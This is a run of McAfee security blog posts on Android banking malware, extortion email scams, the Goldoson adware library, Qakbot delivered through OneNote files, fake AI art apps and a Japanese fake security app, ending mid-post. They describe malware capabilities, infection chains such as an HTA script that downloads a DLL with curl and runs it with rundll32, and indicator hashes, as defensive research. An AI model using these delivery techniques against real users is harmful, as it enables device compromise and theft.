note_intercept  intercept sms message from specified numbers 
intercept_all_phone  intercept sms message from all 
clear_date  delete all file 
clear_phone_contact  delete all contacts 
clear_phone_record  delete all call log 
per_note  quick sms message upload 
soft_name  app name upload 


Cybercriminals are constantly evolving and using new ways to bypass security checks, such as abusing legitimate signing keys. Fortunately, there was no damage to users due to this signing key leak. However, we recommend that users install security software on their devices to respond to these threats. Also, users are recommended to download and use apps from the official app stores. 

McAfee Mobile Security detects this threat as Android/Banker regardless of the application, is signed with the previously legitimate signing key. 


Indicators of Compromise 


SHA256  Name  Type 
7f4670ae852ec26f890129a4a3d3e95c079f2f289e16f1aa089c86ea7077b3d8  신한신청서  Dropper 
9e7c9b04afe839d1b7d7959ad0092524fd4c6b67d1b6e5c2cb07bb67b8465eda  신한신청서  Dropper 
21ec124012faad074ee1881236c6cde7691e3932276af9d59259df707c68f9dc  신한신청서  Dropper 
9621d951c8115e1cc4cf7bd1838b8e659c7dea5d338a80e29ca52a8a58812579  신한신청서  Dropper 
60f5deb79791d2e8c2799e9af52adca5df66d1304310d1f185cec9163deb37a2  보안인증서  Banker 
756cffef2dc660a241ed0f52c07134b7ea7419402a89d700dffee4cc6e9d5bb6  보안인증서  Banker 
6634fdaa22db46a6f231c827106485b8572d066498fc0c39bf8e9beb22c028f6  보안인증서  Banker 
52021a13e2cd7bead4f338c8342cc933010478a18dfa4275bf999d2bc777dc6b  보안인증서  Banker 
125772aac026d7783b50a2a7e17e65b9256db5c8585324d34b2e066b13fc9e12  보안인증서  Banker 
a320c0815e09138541e9a03c030f30214c4ebaa9106b25d3a20177b5c0ef38b3  보안인증서  Banker 
c7f32890d6d8c3402601743655f4ac2f7390351046f6d454387c874f5c6fe31f  보안인증서  Banker 
dbc7a29f6e1e91780916be66c5bdaa609371b026d2a8f9a640563b4a47ceaf92  보안인증서  Banker 
e6c74ef62c0e267d1990d8b4d0a620a7d090bfb38545cc966b5ef5fc8731bc24  보안인증서  Banker 



  • http[://] 
  • http[://] 
  • http[://] 

The post Fakecalls Android Malware Abuses Legitimate Signing Key appeared first on McAfee Blog.

Extortion Fraud is Still on the Rise

18 April 2023 at 20:19

Authored by Lakshya Mathur and Sriram P 

McAfee Intelligence observed a huge spike in extortion email frauds over the past month. The intent of these fraudulent activities is to intimidate individuals into paying a specified amount of money as a ransom. 

Figure 1 shows the number of blackmail emails received over a month recently. 

Figure 1 – Stats for 20 February 2023 – 23rd March 2023


In this blog, we’ll delve into frauds that are becoming increasingly common in the digital age. We’ll first define what these frauds are and provide examples to help readers better understand the nature of these frauds. Additionally, we’ll explore how these frauds are on the rise, highlighting the reasons behind this trend and the impact it has on individuals. 

Finally, we’ll provide practical advice to help consumers protect themselves from these types of attacks. This will include a discussion of some of the most effective measures individuals can take to safeguard their personal and financial information from fraudsters. 

What are Extortion Frauds? 

Extortion emails are a type of scam where cybercriminals send threatening messages to individuals or organizations—demanding payment in exchange for not releasing sensitive or embarrassing information. These emails typically claim that the sender has compromising information, such as private photos or personal data, and threaten to share it with the recipient’s friends, family, or the public unless a payment is made. The payment is usually asked in the form of cryptocurrency, such as Bitcoin in the recent spam, which is difficult to trace and can be transferred quickly and anonymously. The goal of these emails is to scare the recipient into paying the demanded amount, even though there might not be any compromising information to release. 

Examples of Extortion fraud 

Scammers use different scareware sentiments like bad internet browsing habits, hacking for Wi-Fi, and hacking of networks because of hardware vulnerabilities. We’ll now examine various illustrations of extortion emails and analyze scammers’ strategies to intimidate victims into providing payment. By presenting various real-life examples, we can demonstrate how scammers use scareware tactics to manipulate and intimidate their victims into complying with their demands. By instilling fear, the scammers hope to provoke a sense of urgency in the victim, increasing the likelihood that they will pay the demanded ransom. 

Figure 2 – Extortion fraud Example 1 


Figure 2 is an illustration of a typical extortion email that scammers use to exploit their victims. In this instance, the scammer is claiming to have gained unauthorized access to the victim’s account through a security vulnerability in a Cisco router. The scammer is then threatening to expose embarrassing information about the victim unless a payment of $1,340 is made. 

The payment is demanded through a Bitcoin wallet address that the scammer has provided. In this example, the scammer has obfuscated the Bitcoin wallet address by adding spaces between the characters, which is a tactic used to make it harder to track the payment. Now, let us examine another instance of extortion emails. 

Figure 3 – Extortion fraud example 2 


Figure 3 is another example of an extortion email that scammers use to trick and manipulate their victims. In this case, the attacker is claiming to have gained unauthorized access to the victim’s accounts and has deployed trojans and viruses on the victim’s system. The scammer is also blackmailing the victim by alleging that they have explicit adult content about the victim and the victim’s web browsing history. The purpose of this is to instill fear and provoke a sense of urgency in the victim. 

Like the previous example, the scammer has provided a Bitcoin wallet address for the victim to make a ransom payment of $950. Additionally, the attacker has explained that the virus they’ve deployed is undetectable by antivirus software because they’ve used drivers that update the virus every few hours. 

Use of Cryptocurrency 

Cryptocurrency tools are the most common way these scammers ask for a ransom. They use this tactic because it is difficult to trace and can be sent quickly and anonymously to other platforms. We noticed that scammers were demanding ransom payments through Bitcoin wallets. So, we tried to gather statistics on the number of unique Bitcoin wallets we came across in the past month. 

Figure 4 – Unique Bitcoin Stats for 20th February 2023 – 23rd March 2023 

We checked these Bitcoin addresses to see what their transactions activities are and their reputation on the blockchain and Bitcoin abuse database. Below are some snapshots of the transaction of these addresses. 


Figure 5 – Bitcoin received, and abuse report count for Bitcoin address 

As illustrated in Figure 5, it is clear that the Bitcoin addresses mentioned in these extortion emails have numerous abuse reports against them. Additionally, some ransom payments have been received through these addresses. Our intelligence also collected weekly trends on how much money they had within them.

Figure 6 – Total Amount received (US Dollars) in that week  

Figure 6 shows that the amount of money received in these Bitcoin addresses is increasing weekly. This implies that scammers are successfully extorting money from more consumers. 

How to avoid these frauds? 

If you receive extortion emails, follow the steps outlined below. 

  • Don’t make any decisions quickly and don’t panic. If you panic that will be a win for these scammers. 
  • Mostly the stuff they scare you about in the mail is always false. As soon as you receive such think twice before sending payment emails, to block them and delete them. 
  • Try to search important keywords on your search engines, for example, if scammers are claiming to exploit Cisco router vulnerabilities search that vulnerability with keywords like ‘BTC’, ‘hack’, and some other keywords from the email, and you will find many results which will help you to understand that the scammer’s claims are only false. 
  • Try to discover more about the email you got, you can search for the sender’s address, the subject of the mail, or even certain paragraphs from the mail on the internet. You will surely get information on how these emails are only scareware.
  • Keep yourself educated on such scams so that you can protect yourself.
  • Keep your antivirus updated and do timely full scans of your machines.
  • Don’t surf on questionable web pages or download illegal/cracked software. 

Despite advancements in technology, extortion frauds continue to increase as seen in this blog. However, the best defense against such scams is to remain calm, and informed, and to make others aware of such frauds. By following the steps mentioned above, such as not responding to or paying any ransom demands, keeping your system and software updated, using strong passwords, and being wary of unusual emails or links, you can protect yourself from falling victim to these frauds. It is important to stay vigilant and to report any questionable activity to the appropriate authorities. By taking these precautions, you can help prevent yourself and others from becoming victims of extortion fraud. 

The post Extortion Fraud is Still on the Rise appeared first on McAfee Blog.

Goldoson: Privacy-invasive and Clicker Android Adware found in popular apps in South Korea

12 April 2023 at 22:49

Authored by SangRyol Ryu

McAfee’s Mobile Research Team discovered a software library we’ve named Goldoson, which collects lists of applications installed, and a history of Wi-Fi and Bluetooth devices information, including nearby GPS locations. Moreover, the library is armed with the functionality to perform ad fraud by clicking advertisements in the background without the user’s consent. The research team has found more than 60 applications containing this third-party malicious library, with more than 100 million downloads confirmed in the ONE store and Google Play app download markets in South Korea. While the malicious library was made by someone else, not the app developers, the risk to installers of the apps remains. 

McAfee Mobile Security detects this threat as Android/Goldoson and protects customers from this and many other mobile threats. McAfee is a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. We reported the discovered apps to Google, which took prompt action. Google has reportedly notified the developers that their apps are in violation of Google Play policies and fixes are needed to reach compliance. Some apps were removed from Google Play while others were updated by the official developers. Users are encouraged to update the apps to the latest version to remove the identified threat from their devices. 

Top 9 applications previously infected by Goldoson on Google Play

How does it affect users? 

The Goldoson library registers the device and gets remote configurations at the same time the app runs. The library name and the remote server domain varies with each application, and it is obfuscated. The name Goldoson is after the first found domain name. 

Mutating class names

Remote configuration contains the parameters for each of functionalities and it specifies how often it runs the components. Based on the parameters, the library periodically checks, pulls device information, and sends them to the remote servers. The tags such as ‘ads_enable’ or ‘collect_enableindicates each functionality to work or not while other parameters define conditions and availability. 

A response of remote configuration

A response of remote configuration

The library includes the ability to load web pages without user awareness. The functionality may be abused to load ads for financial profit. Technically, the library loads HTML code and injects it into a customized and hidden WebView and it produces hidden traffic by visiting the URLs recursively. 

Pages loaded without user perception
Pages loaded without user perception

Collected data is sent out periodically every two days but the cycle is subject to change by the remote configuration. The information contains some sensitive data including the list of installed applications, location history, MAC address of Bluetooth and Wi-Fi nearby, and more. This may allow individuals to be identified when the data is combined. The following tables show the data observed on our test device. 

Collected Data sent out in JSON format
Collected Data sent out in JSON format

Google Play considers the list of installed apps to be personal and sensitive user data and requires a special permission declaration to get it. Users with Android 11 and above are more protected against apps attempting to gather all installed apps. However, even with the recent version of Android, we found that around 10% of the apps with Goldoson have the permission “QUERY_ALL_PACKAGES” that allows them to access app information. 

Likewise, with Android 6.0 or higher, users may be asked for permissions such as Location, Storage, or Camera at runtime. If user allows the location permission, the app can access not only GPS data but also Wi-Fi and Bluetooth device information nearby. Based on BSSID (Basic Service Set Identifier) and RSSI (Received Signal Strength Indicator), the application can determine the location of the device more accurately than GPS, especially indoors. 

A demo of runtime permission request

Where do the apps come from?

The infected applications come from various Android application stores. More than 100 million downloads have been tracked through Google Play. After that, ONE store, Korea’s leading app store, follows with about 8 million installations. 


As applications continue to scale in size and leverage additional external libraries, it is important to understand their behavior. App developers should be upfront about libraries used and take precautions to protect users’ information. McAfee Mobile Security products can also help detect threats and protect you from not only malware but also unwanted programs. For more information, visit our McAfee Mobile Security. 

Identified Apps and Goldoson Domains



List of Apps and Current Status

Package Name  Application Name  GooglePlay Downloads  GP
Status  L.POINT with L.PAY  10M+   Updated* 
com.Monthly23.SwipeBrickBreaker  Swipe Brick Breaker  10M+  Removed** 
com.realbyteapps.moneymanagerfree  Money Manager Expense & Budget  10M+  Updated* 
com.skt.tmap.ku  TMAP – 대리,주차,전기차 충전,킥보  10M+  Updated*  롯데시네마  10M+  Updated* 
com.ktmusic.geniemusic  지니뮤직 – genie  10M+  Updated* 
com.cultureland.ver2  컬쳐랜드[컬쳐캐쉬]  5M+  Updated* 
com.gretech.gomplayerko  GOM Player  5M+  Updated* 
com.megabox.mop  메가박스(Megabox)  5M+  Removed**  LIVE Score, Real-Time Score  5M+  Updated* 
sixclk.newpiki  Pikicast  5M+  Removed** 
com.appsnine.compass  Compass 9: Smart Compass  1M+  Removed** 
com.gomtv.gomaudio  GOM Audio – Music, Sync lyrics  1M+  Updated* 
com.gretech.gomtv  TV – All About Video  1M+  Updated* 
com.guninnuri.guninday  전역일 계산기 디데이 곰신톡군인  1M+  Updated* 
com.itemmania.imiapp   아이템매니아게임 아이템 거래  1M+  Removed**  LOTTE WORLD Magicpass  1M+  Updated* 
com.Monthly23.BounceBrickBreaker  Bounce Brick Breaker  1M+  Removed** 
com.Monthly23.InfiniteSlice  Infinite Slice  1M+  Removed** 
com.pump.noraebang  나홀로 노래방쉽게 찾아 이용하는  1M+  Updated* 
com.somcloud.somnote  SomNote – Beautiful note app  1M+  Removed** 
com.whitecrow.metroid  Korea Subway Info : Metroid  1M+  Updated*  GOODTV다번역성경찬송  1M+  Removed**  해피스크린해피포인트를 모으  1M+  Updated*  UBhind: Mobile Tracker Manager  1M+  Removed**  스피드 운전면허 필기시험  1M+  Removed** 
com.wtwoo.girlsinger.worldcup  이상형 월드컵  500K+  Updated*  CU편의점택배  500K+  Removed** 
com.appsnine.audiorecorder  스마트 녹음기 : 음성 녹음기  100K+  Removed**  캣메라 [순정 무음카메라]  100K+  Removed**  컬쳐플러스:컬쳐랜드 혜택 더하기  100K+  Updated* 
com.dkworks.simple_air  창문닫아요(미세/초미세먼지/WHO …  100K+  Removed** 
com.lotteworld.ticket.seoulsky  롯데월드타워 서울스카이  100K+  Updated* 
com.Monthly23.LevelUpSnakeBall  Snake Ball Lover  100K+  Removed** 
com.nmp.playgeto  게토(geto) – PC 게이머 필수   100K+  Removed**  기억메모심플해서 좋은 메모장  100K+  Removed**  풀빵 : 광고 없는 유튜브 영상  100K+  Removed** 
com.realbyteapps.moneya  Money Manager (Remove Ads)  100K+  Updated* 
com.wishpoke.fanciticon  Inssaticon – Cute Emoticons, K  100K+  Removed** 
marifish.elder815.ecloud  클라우드런처  100K+  Updated* 
com.dtryx.scinema  작은영화관  50K+  Updated* 
com.kcld.ticketoffice  매표소뮤지컬문화공연 예매& …  50K+  Updated* 
com.lotteworld.ticket.aquarium  롯데월드 아쿠아리움  50K+  Updated* 
com.lotteworld.ticket.waterpark  롯데 워터파크  50K+  Updated* 
com.skt.skaf.l001mtm091  T map for KT, LGU+  50K+  Removed** 
org.howcompany.randomnumber  숫자 뽑기  50K+  Updated* 
com.aog.loader  로더(Loader) – 효과음 다운로드   10K+  Removed**  GOM Audio Plus – Music, Sync l  10K+  Updated* 
com.NineGames.SwipeBrickBreaker2  Swipe Brick Breaker 2  10K+  Removed** 
com.notice.safehome  안심해안심귀가 프로젝트  10K+  Removed** 
kr.thepay.chuncheon  불러봄내춘천시민을 위한 공공  …  10K+  Removed** 
com.curation.fantaholic  판타홀릭아이돌 SNS   5K+  Removed** 
com.dtryx.cinecube  씨네큐브  5K+  Updated* 
com.p2e.tia.tnt  TNT  5K+  Removed**  베스트케어위험한 전자기장, …  1K+  Removed** 
com.ninegames.solitaire  InfinitySolitaire  1K+  Removed** 
com.notice.newsafe  안심해 : 안심지도  1K+  Removed** 
com.notii.cashnote  노티아이 for 소상공인  1K+  Removed** 
com.tdi.dataone  TDI News – 최초 데이터 뉴스   1K+  Removed** 
com.ting.eyesting  눈팅여자들의 커뮤니티  500+  Removed** 
com.ting.tingsearch  팅서치 TingSearch  50+  Removed**  츄스틱 : 크리샤츄 Fantastic  50+  Removed** 
com.player.yeonhagoogokka  연하구곡  10+  Removed** 

* Updated means that the recent application on Google Play does not contain the malicious library. 

** Removed means the application is not available on Google Play as of the time of posting. 

The post Goldoson: Privacy-invasive and Clicker Android Adware found in popular apps in South Korea appeared first on McAfee Blog.

The Rising Trend of OneNote Documents for Malware delivery

30 March 2023 at 23:37

Authored By Anandeshwar Unnikrishnan,Sakshi Jaiswal,Anuradha M 

McAfee Labs has recently observed a new Malware campaign which used malicious OneNote documents to entice users to click on an embedded file to download and execute the Qakbot trojan. 

OneNote is a Microsoft digital notebook application that can be downloaded for free. It is a note-taking app that allows collaboration across organizations while enabling users to embed files and other artifacts. It is installed by default in Microsoft Office 2021 and Microsoft 365.   

Malicious Actors are always trying to find new ways in to infect their victims. Such as their shift to LNK files after Microsoft introduced a policy change disabled office macros by default. Due to a feature that allows users to attach files to OneNote documents it makes them a good alternative to LNK files as distribution vehicle to deploy their malware. This blog contains analysis on how OneNote documents are used malicious and two specific campaigns that made use of OneNote documents to download and execute the Qakbot malware.  

OneNote Campaigns in the wild 

Figure 1 Campaign Heatmap
Figure 1 Campaign Heatmap

Figure 1  shows the geo wise distribution of McAfee customers detecting malicious OneNote files. 

 Based on the telemetry from our endpoints we have identified the following threat families deployed through OneNote documents: 

  • Iceid 
  • Qakbot
  • RedLine
  • AsyncRat
  • Remcos
  • AgentTesla
  • QuasarRAT
  • Netwire
  • Formbook
  • Doubleback 

Overview Of Malicious OneNote Documents 

A holistic view of the phishing campaigns that weaponize OneNote document is shown in Figure 2 below.  The malicious document is delivered in either zip files or ISO images to the target through phishing emails. We have observed that most of the malicious documents either have Windows batch script that invokes Powershell for dropping the malware on the system or Visual Basic scripts that does the same.

Figure 2 Campaign Overview

The generic theme of the email is invoice or legal related. These types of themes are more likely to be opened by the vicim. An example email body and attachment is shown in Figure 3 and 4. 

Figure 3 Email Body
Figure 4 Attachment

A Deep Dive into OneNote File Format 

File Header 

To understand how the data is laid out in the file, we need to examine it at byte level. Taking a close look at OneNote document gives us an interesting observation as its magic bytes for the header is not a trivial one. Figure 5 shows the first 16 bytes of the document binary. 

Figure 5 OneNote Header

The first 16 bytes need to be interpreted as GUID value {7B5C52E4-D88C-4DA7-AEB1-5378D02996D3}. We can use the official documentation for OneNote specification to make sense of all the bytes and its structuring. Figure 6 shows header information taken from the OneNote specification document. 

Figure 6 OneNote Specification

The Data Stream in OneNote, Say Hello To FileDataStoreObject 

To find the embedded data in a OneNote document, we need to learn more about the FileDataStoreObject which has a GUID value of {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}. The structure that holds the data is shown below: 

  • guidHeader (16 bytes) 
  • Size: 16 bytes 
  • Value: {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} 
  • cbLength 
  • Size: 8 bytes 
  • Value: Size of the data 
  • unused 
  • Size: 4 bytes 
  • reserved 
  • Size: 8 bytes 
  • FileData 
  • Size: Variable 
  • guidFooter 
  • Size: 16 bytes 
  • Value: {71FBA722-0F79-4A0B-BB13-899256426B24} 

The FileData member of the FileDataStoreObject is the key member that holds the embedded data in the OneNote document. The size can be retrieved from the cbLength member. 

Figure 7 shows the “on disk” representation of the FileDataStoreObject  This is taken from a malicious OneNote document used to spread the Qakbot payload. The guidHeader for the data object is highlighted in yellow and the data is shown in red. As it is evident from the image the data represents a text file which is a script to launch PowerShell.  

Figure 7 Embedded data in Data object

For more information on the OneNote specification, go to reference section  

Artifact Extraction  

Now we have an idea of what the data object is, with this knowledge we can automate the process of extracting embedded artifacts for further analysis from the OneNote document by following the below algorithm. 

  • Search for FileDataStoreObject GUID in the binary. 
  • Interpret the FileDataStoreObject structure  
  • Retrieve cbLength member (size of the data represented by FileDataStoreObject) 
  • Read N bytes (cbLength) after Reserved 8 bytes in FileDataStoreObject. 
  • Dump the bytes read on to disk 
  • Repeat above steps for every FileDataStoreObject present in the binary

Embedded Executable Objects In OneNote  

Execution Of Embedded Entities  

Looking at the runtime characteristics of OneNote Desktop application we have observed that when an embedded file gets executed by the user, it is stored temporarily in the OneNote directory in the User’s Temp location. Each directory with GUID values represents a different document opened in the OneNote application. 

Figure 8 OneNote directory in Temp

By analyzing numerous malicious documents, we have been able to create a “test” OneNote document that executes a batch file that contains the “whoami” command. The image in Figure  9 show the batch file being created in the user’s temp location. 

Figure 9 OneNote drops embedded artifacts in Temp directory

Qakbot Campaign 1: 

This section contains specific details on a Qakbot campaign. In campaign 1, the malware author used phishing emails to deliver malicious OneNote document either as attachment or a URL link to zip file containing the OneNote document. The OneNote contained aHTA file that once executed would make use of  the curl utility to download Qakbot and then execute it. 

Infection Flow: 

Figure 10 Infection Chain
  • Spam email delivers a malicious OneNote file as an attachment or a link to a ZIP file that contains a OneNote file. 
  • OneNote file contains an embedded HTA  attachment and a fake message to lure users to execute the HTA  file 
  • The HTA file uses curl utility to download the Qakbot payload and is executed by rundll32.exe. 

Technical Analysis: 

The OneNote file with the embedded HTA file is shown in the Figure 11. Once this OneNote file is opened, it prompts the user with a fake message to double-click on open to view the attachment. 

Figure 11 OneNote Template

Upon clicking the Open button, it drops the HTA file with the name Open.hta to the %temp% Folder and executes it using mshta.exe. 

Figure 12 Drop file in Temp location

The HTA file contains obfuscated script as shown below: 

Figure 13 Obfuscated HTA script

The HTA file is loaded by MSHTA and creates a registry key in HKEY_CURRENT_USER\SOFTWARE\ with obfuscated content as shown below: 

Figure 14 Registry key creation
  • The obfuscated registry is then read by MSHTA and the obfuscated code is de-obfuscated. The code is then initialized to a new function object as shown in Block1. 
  • Finally, MSHTA calls this function by passing the malicious URL as a parameter and then deletes the registry key as shown in Block 2.

De-obfuscated content from the HTA file is shown below: 

Figure 15 Deobfuscated HTA content
  • Curl is used to download the malicious DLL file in C:\ProgramData Folder with .png extension. The script will then execute the downloaded file with Rundll32.exe with the export function Wind.
Figure 16 Downloaded payload in ProgramData
  • A fake error message is displayed after loading the downloaded payload and MSHTA is terminated.  
Figure 17 Fake error message

Figure 18 shows the process tree of Qakbot: 

Figure 18 Process Chain


Type  Value  Product  Detected 
Campain 1 – OneNote File  88c24db6c7513f47496d2e4b81331af60a70cf8fb491540424d2a0be0b62f5ea  Total Protection and LiveSafe  VBS/Qakbot.a 
Campain 1 – HTA File  e85f2b92c0c2de054af2147505320e0ce955f08a2ff411a34dce69c28b11b4e4  Total Protection and LiveSafe  VBS/Qakbot.b 
Campain 1 – DLL File  15789B9b6f09ab7a498eebbe7c63b21a6a64356c20b7921e11e01cd7b1b495e3  Total Protection and LiveSafe  Qakbot-FMZ 

Campaign 2: 

Examining Malicious OneNote Documents 

The OneNote document for campaign 2 is shown in Figure 19. At first glance it it appears that there is a ‘Open’ button embedded within the document. The message above the ‘Open’ button instructs the user to “double click” in order to receive the attachment.

Figure 19 Malicious content

A closer look at the document reveals the graphical elements are all images placed in a layered style by the malicious actor. By moving the icons aside, we can see the malicious batch file which when executed downloads the payload from the Internet and executes on the target system. 

Figure 20 Hidden Malicious dropper script
Figure 20 Hidden Malicious dropper script

Execution Of Payload Dropper 

Upon execution of the batch file, Powershell will be invoked and it fetch the Qakbot payload from Internet and execute it on the target system. This section will cover details of dropper script used to deploy QakBot. The Figure 21 Show the process tree after the execution of the script and you can see that powershell.exe was launched by cmd.exe and the parent of cmd.exe is onenote.exe. 

Figure 21 Process chain

The contents of process cmd.exe (7176) are shown below.  

Figure 22 Cmd.exe properties

The base64 decoded batch file is shown in Figure 23This will use powershell to download the payload and then execute it with rundll32.exe

Figure 23 Base64 Decoded instructions in dropper


Type  Value  Product  Detected 
Campain 2 – Zip File  000fb3799a741d80156c512c792ce09b9c4fbd8db108d63f3fdb0194c122e2a1 


Total Protection and LiveSafe  VBS/Qakbot.a 
Campain 2 – OneNote File  2bbfc13c80c7c6e77478ec38d499447288adc78a2e4b3f8da6223db9e3ac2d75  Total Protection and LiveSafe  One/Downloader.a 
Campain 2 – Powershell File  b4dd3e93356329c076c0d2cd5ac30a806daf46006bdb81199355952e9d949424  Total Protection and LiveSafe  PS/ 
Campain 2 – OneNoteFile  a870d31caea7f6925f41b581b98c35b162738034d5d86c0c27c5a8d78404e860   Total Protection and LiveSafe  VBS/Qakbot.a 



Malware authors are getting more sophisticated when it comes to hiding their payloads. This Blog highlights the recent Qakbot campaign that delivers its payload which uses the OneNote application as a delivery mechanism. McAfee Customers should keep their systems up-to-date and refrain from clicking links and opening attachments in suspicious emails to stay protected. 


The post The Rising Trend of OneNote Documents for Malware delivery appeared first on McAfee Blog.

The Rise and Risks of AI Art Apps

26 January 2023 at 00:31

Authored by Fernando Ruiz

The popularity of AI-based mobile applications that can create artistic images based on pictures, such as the “Magic Avatars” from Lensa, and the OpenAI service DALL-E 2 that generates them from text, have increased the mainstream interest of these tools. Users should be aware of those seeking to take advantage to distribute Potential Unwanted Programs (PUPs) or malware, such as through deceptive applications that promise the same or similar advanced features but are just basic image editors or otherwise repackaged apps that can drain your data plan and battery life with Clicker and HiddenAds behaviors, subscribe you to expensive services that provide little or no value over alternatives  (Fleeceware), or even steal your social media account credentials (FaceStealer).

Dozens of apps surface daily claiming to offer AI image creation. Some of them might be legitimate or based on open-source projects such as Stable Diffusion, but in the search for a free application that produces quality results, users might try new apps that could compromise their privacy, user experience, wallet and/or security.

The McAfee Mobile Research Team recently discovered a series of repackaged image editors on the Google Play app store which presented concerning behaviors.  McAfee Mobile Security products help protect against such apps, including those classified as Android/FakeApp, Android/FaceStealer, Android/PUP.Repacked and Android/PUP.GenericAdware.

McAfee, a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem, reported the discovered apps to Google, which took prompt action and the apps are no longer available on Google Play.

We now discuss various types of privacy and/or security risks associated with the types of apps recently removed from the app store.


“Pista Cartoon Photo Effect” and “NewProfilePicture” are examples of apps that offered compelling visual results, however, each was based on the same image editor with basic filters and trojanized with Android/FaceStealer, which is a well-known malware capable of compromising a victim’s Facebook or Instagram account. The apps could capture user credentials during a Facebook login by embedding a javascript function loaded from a remote server (to evade detection) into a flutter webview activity that displays the Facebook login screen. 

“NewProfilePicture” and “Pista – Cartoon Photo Effect” are examples of FaceStealer malware that posed as a cartoon avatar creator.

The same image editor which was repackaged into the above two apps has also been repackaged alternatively with adware modules and distributed by other developers under other app names, such as “Cartoon Effect | Cartoon Photo”:  



Fleeceware refers to mobile apps that use various tactics to enroll users into subscriptions with high fees, typically after a free trial period, and often with little or no value to the subscriber beyond cheaper or free alternatives. If the user does not take care to cancel their subscription, they continue to be charged even after deleting the app.

“Toonify Me”, which is no longer available on the Play Store, cost $49.99 per week after 3 days – almost $2,600 per year – for what featured AI-generated illustrations in the app description, but was another repackaged version of the same image editor functionality found within “NewProfilePicture” and “Pista – Cartoon Photo Effect”. 

In this case, the “Toonify Me” app did not allow feature access without enrolling in the subscription, and the “CONTINUE” button which initiated the subscription was the only option to tap in the app once it was launched.


Promoted by ads that described it as capable of transforming pictures into artistic drawings, the “Fun Coloring – Paint by Number app is an example of a repackaged version of a different, legitimate pixel painting app.  It lacked the advertised AI effects and was plagued with adware-like behavior 

Advertisement of “Fun Coloring – Paint by Number” on social media which included app store link 

Consistent with many reviews complaining about unexpected ads out of the context of the app, once installed, the app started a service that communicated in the background with Facebook Graph API every 5 seconds and might pull ads based on received commands after some time of execution. The app contained multiple injected SDK modules from AppsFlyer, Fyber, InMobi, IAB, Mintegral, PubNative and Smaato (none of which are in the original app, which was repackaged to include these), which would help monetize installations without regard for user experience. 


When new types of apps become popular and new ones appear on the market to offer similar features, users should act with caution to avoid becoming victim to those wanting to exploit public interest.

When installing an app that causes you doubt, make sure you:

  • Read the pricing and other terms carefully
  • Check those permissions requested are reasonable with the purpose of the app
  • Look for consistently bad reviews describing unexpected or unwanted app behavior
  • Verify if the developer has other apps available and their reviews
  • Consider skipping the app download if you aren’t convinced of its safety

Even if an app is legitimate, we also encourage users to look closely before installation at any available privacy policy to understand how personal data will be treated.  Your face is a biometric identifier that’s not easy to change, and multiple pictures might be needed (and stored) to create your model.

Artificial intelligence tools will continue to amaze us with their capabilities and probably will become more accessible and safer to use over time.  For now, keep in mind that AI technology is still limited and experimental, and can be expensive to use – always consider any hidden costs.  AI also will bring more challenges as we discussed on the 2023 McAfee Threat Prediction blog.


The following table lists the application package name, hash sum SHA256, the minimum number of installations on Google Play, and the type of detected threat. These apps were removed from Google Play, but some may remain available elsewhere.

Package Name SHA256 Installs Type
com.ayogamez.sketchcartoon 9cb1d996643fbec26bb9878939735221dfbf639075ceea3abdb94e0982c494c1 5M Adware
com.rocketboosterapps.toonifyme 3f45a38b103e1812146df8ce179182f54c4a0191e19560fcbd77240cbc39886b 10K Fleeceware
com.nhatanhstudio.cartoon.photoeffect 2c7f4fc403d1449b70218624d8a409497bf4694493c7f4c06cd8ccecff21799a 5K Repackaged Adware
com.cambe.PhotoCartoon 5327f415d0e9b21523f64403ec231e1fd0279c48b41f023160cd1d70dd733dbf 10K Repackaged Adware
com.chiroh.cartoon.prismaeffect 18fef9f92639e31dd6566854feb30e1e4333b971b05ae9aba93ac0aa395c955b 1K Repackaged Adware
3b941b7005572760b95239d73b8a8bbfdb81d26d405941171328daa8f3c01183 50 Repackaged Adware
com.waxwell.saunders.pistaphotoeditor 489d4aaec3bc694ddd124ab8b4f0b7621a51aad13598fd39cd5c3d2067b950e5 50 FaceStealer
com.ashtoon.tooncool.skordoi 980c090c01bef890ef74bd93e181d67a5c6cd1b091573eaaf2e1988756aacd50 100K FaceStealer
com.faceart.savetoon.cartoonedit 55ffc2e392280e8967de0857b02946094268588209963c6146dad01ae537daca 100 FaceStealer e696d7304e5f56d7125dd54c853ff35a394a4175fcaf7785d332404e161d6deb 500K FaceStealer
com.onlansuyanto.editor.bading 59f9630c2ebe4896f585ec7722c43bb54c926e3e915dcfa4ff807bea444dc07b 10K FaceStealer
com.madtoon.aicartoon.kiroah c29adfade300dde5e9c31b23d35a6792ed4a7ad8394d37b69b5cecc931a7ad9f 100K FaceStealer 24cf7fcaefe98bc9db34f551d11906d3f1349a5b60adf5fa37f15a872b61ee95 100K FaceStealer
com.funcolornext.beautyfungoodcolor b2cfa8b2eccecdcb06293512df0db463850704383f920e5782ee6c5347edc6f5 100K Repackaged



The post The Rise and Risks of AI Art Apps appeared first on McAfee Blog.

Fake Security App Found Abuses Japanese Payment System

30 November 2022 at 18:41

Authored by SangRyol Ryu and Yukihiro Okutomi 

McAfee’s Mobile Research team recently analyzed new malware targeting mobile payment users in Japan. The malware which was distributed on the Google Play store pretends to be a legitimate mobile security app, but it is in fact a payment fraud malware stealing passwords and abusing reverse proxy targeting the mobile payment services. McAfee researchers notified Google of the malicious apps, スマホ安心セキュリティ, or ‘Smartphone Anshin Security, package name and com.z.px.appx. The applications are no longer available on Google Play. Google Play Protect has also taken steps to protect users by disabling the apps and providing a warning. McAfee Mobile Security products detect this threat as Android/ProxySpy.  

How do victims install this malware? 

The malware actor continues to publish malicious apps on the Google Play Store with various developer accounts. According to the information posted on Twitter by Yusuke Osumi, Security Researcher at Yahoo! Japan, the attacker sends SMS messages from overseas with a Google Play link to lure users to install the malware. To attract more users, the message entices users to update security software. 

A SMS message from France (from Twitter post by Yusuke)

A SMS message from France (from Twitter post by Yusuke)

malware on Google play

Malware on Google Play 

The Mobile Research team also found that the malware actor uses Google Drive to distribute the malware. In contrast to installing an application after downloading an APK file, Google Drive allows users to install APK files without leaving any footprint and makes the installation process simpler. Once the user clicks the link, there are only a few more touches required to run the application. Only three clicks are enough if users have previously allowed the installation of unknown apps on Google Drive. 

Following notification from McAfee researchers, Google has removed known Google Drive files associated with the malware hashes listed in this blog post. 


What does this malware look like?

